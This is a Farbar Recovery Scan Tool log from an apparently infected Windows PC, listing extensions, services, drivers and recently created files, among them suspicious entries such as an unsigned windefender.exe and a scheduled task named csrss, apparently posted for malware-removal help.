CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-01-08]
CHR Extension: (Gmail) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-08]
CHR Extension: (Chrome Media Router) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-01-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx <not found>
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-08-26] (Apple Inc. -> Apple Inc.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [105120 2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
R2 ibtsiva; C:\Windows\system32\ibtsiva.exe [184072 2017-01-13] (Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [359680 2019-07-12] (Intel Corporation -> Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268968 2017-11-12] (Intel(R) Wireless Connectivity Solutions -> )
R2 SEVPNCLIENT; C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [5248312 2019-05-12] (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [339456 2013-08-16] (IDT, Inc.) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2017-01-08] (Microsoft Windows -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [2079744 2020-02-07] () [File not signed]
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare Technology Co.,Ltd -> Wondershare)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3758760 2017-11-12] (Intel(R) Wireless Connectivity Solutions -> Intel® Corporation)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\MobileGo\DriverInstall.exe" [X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 amdhub30; C:\Windows\system32\drivers\amdhub30.sys [108768 2016-01-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, INC.)
S3 amdhub31; C:\Windows\system32\drivers\amdhub31.sys [141528 2016-02-26] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc.)
S3 amdxhc; C:\Windows\system32\drivers\amdxhc.sys [229088 2016-01-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, INC.)
S3 amdxhc31; C:\Windows\system32\drivers\amdxhc31.sys [440536 2016-02-26] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc.)
S3 ampa; C:\Windows\system32\ampa.sys [38320 2016-12-25] (CHENGDU AOMEI Tech Co., Ltd. -> )
R3 AmUStor; C:\Windows\System32\drivers\AmUStor.SYS [118184 2018-05-14] (Alcorlink Corp. -> )
R3 btmaudio; C:\Windows\System32\drivers\btmaud.sys [101352 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
S3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [158696 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [1560552 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 EtronHub3; C:\Windows\System32\Drivers\EtronHub3.sys [65408 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 EtronSTOR; C:\Windows\System32\Drivers\EtronSTOR.sys [39296 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 EtronXHCI; C:\Windows\System32\Drivers\EtronXHCI.sys [94208 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 FLxHCIh; C:\Windows\system32\drivers\FLxHCIh.sys [88016 2016-12-09] (Fresco Logic Inc -> Fresco Logic)
S3 IaNVMe; C:\Windows\system32\drivers\IaNVMe.sys [113160 2016-11-04] (Intel(R) NVMe Windows Driver -> Intel Corporation)
R0 IaNVMeF; C:\Windows\System32\drivers\IaNVMeF.sys [35848 2016-11-04] (Intel(R) NVMe Windows Driver -> Intel Corporation)
S3 IaRNVMe; C:\Windows\system32\drivers\IaRNVMe.sys [592408 2016-01-22] (Intel(R) Rapid Storage Technology Enterprise -> Intel Corporation)
R0 IaRNVMeF; C:\Windows\System32\drivers\IaRNVMeF.sys [36888 2016-01-22] (Intel(R) Rapid Storage Technology Enterprise -> Intel Corporation)
R3 ibtusb; C:\Windows\System32\DRIVERS\ibtusb.sys [206344 2017-06-27] (Intel(R) Wireless Connectivity Solutions -> Intel Corporation)
R3 L1C; C:\Windows\System32\DRIVERS\L1C63x64.sys [125048 2016-01-29] (Rivet Networks LLC -> Qualcomm Atheros, Inc.)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [199760 2016-11-29] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation)
S3 mvusbews; C:\Windows\System32\Drivers\mvusbews.sys [20480 2012-12-24] (Microsoft Windows Hardware Compatibility Publisher -> Marvell Semiconductor, Inc.)
R3 Neo_VPN; C:\Windows\System32\DRIVERS\Neo_0061.sys [38088 2019-05-12] (SoftEther Corporation -> SoftEther Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\Netwsw02.sys [3427848 2017-11-08] (Intel(R) Wireless Connectivity Solutions -> Intel Corporation)
S3 ocznvme; C:\Windows\system32\drivers\ocznvme.sys [99592 2016-06-10] (Toshiba America Electronic Components, Inc. -> TOSHIBA CORPORATION)
R0 ocztrimfilter; C:\Windows\System32\drivers\ocztrimfilter.sys [29064 2016-06-10] (Toshiba America Electronic Components, Inc. -> TOSHIBA CORPORATION)
S3 rusb3hub; C:\Windows\system32\drivers\rusb3hub.sys [114568 2012-08-27] (Renesas Electronics Corporation -> Renesas Electronics Corporation)
S3 rusb3xhc; C:\Windows\system32\drivers\rusb3xhc.sys [230280 2012-08-27] (Renesas Electronics Corporation -> Renesas Electronics Corporation)
R3 SEE; C:\Windows\System32\drivers\see.sys [49864 2019-05-12] (SoftEther Corporation -> SoftEther Corporation)
S3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [41512 2017-12-07] (Intel Corporation -> )
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [33008 2013-05-02] (Synaptics Incorporated -> Synaptics Incorporated)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 STHDA; C:\Windows\System32\DRIVERS\stwrt64.sys [551936 2013-08-16] (Microsoft Windows Hardware Compatibility Publisher -> IDT, Inc.)
S3 tilfilter; C:\Windows\system32\drivers\TIxHCIlfilter.sys [17672 2015-02-11] (Texas Instruments, Inc. -> Texas Instruments, Inc.)
S3 tiufilter; C:\Windows\system32\drivers\TIxHCIufilter.sys [23304 2015-02-11] (Texas Instruments, Inc. -> Texas Instruments, Inc.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-02-01] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 VUSB3HUB; C:\Windows\system32\drivers\ViaHub3.sys [221696 2015-08-20] (Microsoft Windows Hardware Compatibility Publisher -> VIA Technologies, Inc.)
S3 xhcdrv; C:\Windows\system32\drivers\xhcdrv.sys [294912 2015-08-20] (Microsoft Windows Hardware Compatibility Publisher -> VIA Technologies, Inc.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 MBAMService; no ImagePath
S3 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X]
S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-02-07 20:46 - 2020-02-07 20:46 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\EpicNet Inc
2020-02-07 20:45 - 2020-02-07 20:45 - 002079744 ____H C:\Windows\windefender.exe
2020-02-07 20:45 - 2020-02-07 20:45 - 000003490 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-02-07 20:44 - 2020-02-07 20:44 - 000000000 ___RD C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGiStart Menu\Programs\BT Devices
2020-02-07 20:40 - 2020-02-07 20:19 - 008356016 _____ (Malwarebytes) C:\Users\Jomko\Desktop\adwcleaner_8.0.2.exe
2020-02-06 21:29 - 2020-02-06 21:30 - 000047825 _____ C:\Users\Jomko\Desktop\Addition.txt
2020-02-06 21:28 - 2020-02-07 20:56 - 000027126 _____ C:\Users\Jomko\Desktop\FRST.txt
2020-02-06 21:27 - 2020-02-06 21:23 - 002279424 _____ (Farbar) C:\Users\Jomko\Desktop\FRST64.exe
2020-02-06 21:24 - 2020-02-07 20:55 - 000000000 ____D C:\FRST
2020-01-26 19:07 - 2020-01-26 19:07 - 000077280 _____ (Bitvise Limited) C:\Windows\system32\BvEventSource.exe
2020-01-26 19:07 - 2020-01-26 19:07 - 000076336 _____ (Bitvise Limited) C:\Windows\MstscTitle64.dll
2020-01-26 19:07 - 2020-01-26 19:07 - 000069168 _____ (Bitvise Limited) C:\Windows\MstscTitle32.dll
2020-01-26 19:07 - 2020-01-26 19:07 - 000002421 _____ C:\Users\Public\Desktop\Bitvise SSH Client.lnk
2020-01-26 19:07 - 2020-01-26 19:07 - 000002421 _____ C:\ProgramData\Desktop\Bitvise SSH Client.lnk
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\Users\Jomko\AppData\Local\Bitvise
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitvise SSH Client
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\Program Files (x86)\Bitvise SSH Client
2020-01-26 15:54 - 2020-01-26 15:54 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Google
2020-01-25 00:49 - 2020-01-25 00:49 - 000000000 ____D C:\Windows\pss
2020-01-25 00:24 - 2020-01-25 00:24 - 000003158 _____ C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE}
2020-01-25 00:22 - 2020-01-25 00:45 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-01-25 00:21 - 2020-01-25 00:21 - 000000000 ____D C:\Program Files\Malwarebytes
2020-01-24 21:54 - 2020-01-24 21:54 - 000389624 _____ C:\Windows\Minidump\012420-10249-01.dmp
2020-01-22 23:59 - 2020-01-22 23:59 - 000001617 _____ C:\Users\Jomko\Desktop\Kodi.lnk
2020-01-22 23:07 - 2020-01-26 18:25 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Kodi
2020-01-22 23:06 - 2020-01-22 23:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kodi
2020-01-22 23:06 - 2020-01-22 23:06 - 000000000 ____D C:\Program Files\Kodi
2020-01-22 22:54 - 2020-01-24 21:00 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\vlc
2020-01-22 22:51 - 2020-01-22 22:51 - 000000840 _____ C:\Users\Public\Desktop\VLC media player.lnk
2020-01-22 22:51 - 2020-01-22 22:51 - 000000840 _____ C:\ProgramData\Desktop\VLC media player.lnk
2020-01-22 22:51 - 2020-01-22 22:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-01-22 22:50 - 2020-01-22 22:50 - 000000000 ____D C:\Program Files\VideoLAN
2020-01-22 20:46 - 2020-01-22 20:47 - 000000000 ___SD C:\32788R22FWJFW
2020-01-22 20:28 - 2020-01-22 20:28 - 000034489 _____ C:\ComboFix.txt
2020-01-22 17:55 - 2020-01-22 20:47 - 000000000 ____D C:\Windows\erdnt
2020-01-22 17:29 - 2020-01-22 17:33 - 142164912 _____ (Microsoft Corporation) C:\Users\Jomko\Downloads\MSERT.exe
2020-01-22 17:20 - 2020-01-22 17:24 - 000000000 ____D C:\ProgramData\ESET
2020-01-22 17:20 - 2020-01-22 17:24 - 000000000 ____D C:\Program Files\ESET
2020-01-22 17:17 - 2020-01-22 17:17 - 005504960 _____ (ESET) C:\Users\Jomko\Downloads\eset_smart_security_premium_live_installer_rt_sk.exe
2020-01-22 15:00 - 2020-01-22 15:00 - 000335528 _____ C:\Windows\Minidump\012220-10062-01.dmp
2020-01-22 14:31 - 2020-01-22 14:31 - 000000000 __SHD C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c
2020-01-22 14:31 - 2020-01-22 14:31 - 000000000 ____D C:\Windows\system32\Tasks\U-9-6-42-1263061080-1218707829-1038753275-4479
2020-01-22 14:29 - 2020-02-07 20:45 - 000003182 _____ C:\Windows\system32\Tasks\csrss
2020-01-22 14:29 - 2020-01-22 17:00 - 000000000 ___HD C:\Windows\rss
2020-01-22 14:29 - 2020-01-22 14:30 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-01-22 14:29 - 2020-01-22 14:30 - 000629984 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-01-22 14:28 - 2020-01-22 14:28 - 000000000 _____ C:\Users\Jomko\Documents\codec m3u vlc
2020-01-22 12:39 - 2020-01-22 22:40 - 000000000 ____D C:\Program Files (x86)\VideoLAN
2020-01-22 10:49 - 2020-01-22 14:41 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-01-21 11:01 - 2020-01-21 11:01 - 008000936 _____ (Tim Kosse) C:\Users\Jomko\Downloads\FileZilla_3.46.3_win64-setup.exe
2020-01-16 13:58 - 2020-01-16 13:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2020-01-16 13:57 - 2020-01-16 13:57 - 000000000 ____D C:\Program Files\Logitech
2020-01-16 00:57 - 2020-01-16 00:57 - 000000000 ____D C:\Windows\rescache
2020-01-15 23:25 - 2019-12-31 03:40 - 000123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2020-01-15 23:25 - 2019-12-31 03:32 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2020-01-15 21:37 - 2020-01-03 04:42 - 004061624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2020-01-15 21:37 - 2020-01-03 04:42 - 003967416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2020-01-15 21:37 - 2020-01-03 04:41 - 001320248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000834048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000555520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000275968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000261632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-01-15 21:37 - 2020-01-03 04:37 - 000709856 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-01-15 21:37 - 2020-01-03 04:37 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000627424 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-01-15 21:37 - 2020-01-03 04:37 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000263904 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000096992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2020-01-15 21:37 - 2020-01-03 04:37 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:36 - 000155360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2020-01-15 21:37 - 2020-01-03 04:35 - 001671296 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001472512 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001211392 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001010688 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000733184 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000408576 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000361984 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000236032 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000094208 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\sscore.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
